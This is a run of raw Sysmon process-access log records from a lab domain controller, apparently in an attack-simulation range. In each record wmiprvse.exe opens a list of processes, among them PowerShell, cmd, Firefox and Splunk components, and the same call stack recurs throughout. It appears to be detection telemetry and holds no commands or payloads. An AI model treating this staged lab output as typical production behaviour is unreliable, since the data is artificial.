22:55:40.005{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-649E-603D-AB86-00000000AD01}5896C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697143Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:40.005{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-4090-603D-F281-00000000AD01}2992C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697142Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:40.005{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-4090-603D-F181-00000000AD01}1592C:\Windows\system32\cmd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697141Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:40.005{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-1E7B-603D-D27D-00000000AD01}2752C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697140Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:40.005{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-1E7B-603D-D17D-00000000AD01}4500C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697139Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:40.005{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-1E7A-603D-D07D-00000000AD01}5796C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697138Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:40.005{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-FB2E-603C-9079-00000000AD01}4328C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697137Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:40.005{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-FB27-603C-8779-00000000AD01}2272C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697136Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:40.005{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-FB20-603C-5D79-00000000AD01}1652C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697135Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:40.005{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-FB1F-603C-5979-00000000AD01}6484C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697134Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:40.005{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7A5F-6039-4410-00000000AD01}2140C:\Windows\System32\rundll32.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697133Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:40.005{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7957-6039-1D10-00000000AD01}2836C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697132Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:40.005{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7949-6039-1B10-00000000AD01}5344C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697131Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:40.005{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7948-6039-1A10-00000000AD01}4808C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697130Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:39.990{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7947-6039-1910-00000000AD01}5136C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697129Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:39.990{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7947-6039-1810-00000000AD01}4892C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697128Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:39.990{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7946-6039-1610-00000000AD01}3144C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697127Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:39.990{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-76AE-6039-B70F-00000000AD01}5892C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697126Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:39.990{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-76AE-6039-B60F-00000000AD01}5836C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697125Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:39.990{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-74FB-6039-800F-00000000AD01}6628C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 